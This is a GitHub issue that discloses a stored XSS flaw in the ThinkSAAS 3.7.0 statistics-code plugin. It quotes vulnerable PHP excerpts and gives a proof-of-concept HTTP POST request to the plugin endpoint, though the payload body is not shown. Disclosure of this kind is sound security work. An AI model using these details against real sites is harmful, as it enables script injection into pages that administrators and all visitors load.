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ThinkSAAS 3.7.0 has a storage XSS vulnerability #34

Open Hebing123 opened 5 months ago

Hebing123 commented 5 months ago


There is a storage XSS vulnerability in ThinkSAAS 3.7.0. The vulnerability occurs in the "back-plug-management-statistics code plug-in", where modifying the statistics code does not require CSRF validation, so an attacker can construct a form that allows an administrator to propose the addition of the statistics code. The plugins/edit/pubs/counter.php is not right code is strictly filtered, so every time an administrator accesses index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html that directly references the variable {$code} triggers a stored XSS vulnerability. If the statistics code plug-in is turned on, then all users accessing the website will trigger the stored XSS vulnerability on any page.Because, according to the plugins/pubs/counter/counter.php logic, {$code} will be inserted into the all pages.


defined('IN_TS') or die('Access Denied.');

    case "set":

        $strAbout = fileRead('plugins/pubs/counter/about.php');

        $code = fileRead('data/plugins_pubs_counter.php');
            $code = $tsMySqlCache->get('plugins_pubs_counter');
        $code = stripslashes($code);

        include template('edit_set','counter');

    case "do":
        $code = tsTrim($_POST['code']);


        header('Location: '.SITE_URL.'index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set');

As above, the plugins/pubs/counter/edit. PHP in modified statistical code have no code in the tag </textarea> filtering, so that the follow-up in edit_set.html rendering {$code}, The </textarea> closing the <textarea> tag causes the $code that should be inside the textarea tag to be outside the tag.

Proof of Concept (POC)

POST /index.php?ac=plugin&app=pubs&in=edit&plugin=counter&ts=do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7i6edin000gfa5r6s1aje15noc; ts_email=admin%40admin.com; ts_autologin=rufq90izjw0s8kko8gkgk8gkg0s80g8
Content-Length: 58
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Host: your-ip
Connection: Keep-alive



Hebing123 commented 4 months ago
